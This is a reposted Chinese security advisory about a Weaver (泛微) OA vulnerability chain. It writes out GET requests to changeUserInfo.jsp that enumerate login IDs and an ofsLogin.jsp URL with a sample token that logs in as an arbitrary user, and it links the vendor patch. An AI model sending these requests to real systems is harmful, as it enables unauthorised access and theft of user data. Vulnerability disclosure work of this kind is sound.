泛微 OA ofsLogin.jsp 任意用户登录

admin 2024年2月10日01:30:09评论17 views字数 1027阅读3分25秒阅读模式
漏洞简介

2023年05月15日,泛微官方发布10.57.2版本安全补丁。其中修复了两个漏洞,分别是信息泄漏和任意用户登录漏洞,两个漏洞可以被攻击者组合起来利用,从而能够使攻击者进入到系统后台。

漏洞危害
  • 窃取敏感信息:攻击者可以通过绕过系统的访问控制机制,窃取系统中的敏感信息,例如用户的身份信息、密码、银行卡信息等。

  • 修改或删除数据:攻击者可以利用绕过权限的漏洞,修改或删除系统中的数据,对受害者造成损失。

漏洞复现

任意用户登录漏洞的利用前提是,需要已知一个存在于HrmResource表中的loginid

信息泄露
#当数量大于1响应为{"status":"0"},当等于1时输出查到的loginidGET /mobile/plugin/changeUserInfo.jsp?type=getLoginid&mobile=1234 HTTP/1.1

#如果提供的loginId参数值在HrmResourceManager表中存在,则code的值会等于"21",否则code等于"-1"GET /mobile/plugin/changeUserInfo.jsp?type=status&loginId=123 HTTP/1.1

#如果提供的loginId参数值在HrmResourceManager表中存在,则Userid的值会等于 "340",否则 Userid等于"0"GET /mobile/plugin/changeUserInfo.jsp?type=getUserid&loginId=123 HTTP/1.1
当数量大于1响应为{"status":"0"},当等于1时输出查到的loginid

泛微 OA ofsLogin.jsp 任意用户登录

任意用户登录

在已知一个loginId值为 "xxx"的情况下,首先通过加密算法生成loginTokenFromThird的值,然后通过请求以下路径进入后台。
http://x.x.x.x/mobile/plugin/1/ofsLogin.jsp?gopage=/wui/index.html&loginTokenFromThird=866fb3887a60239fc112354ee7ffc168&receiver=1&syscode=1&timestamp

泛微 OA ofsLogin.jsp 任意用户登录

修复方法

厂商已发布最新安全补丁:
https://www.weaver.com.cn/cs/securityDownload.html?src=cn

原文始发于微信公众号(南街老友):泛微 OA ofsLogin.jsp 任意用户登录

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月10日01:30:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微 OA ofsLogin.jsp 任意用户登录https://cn-sec.com/archives/2485920.html

发表评论

匿名网友 填写信息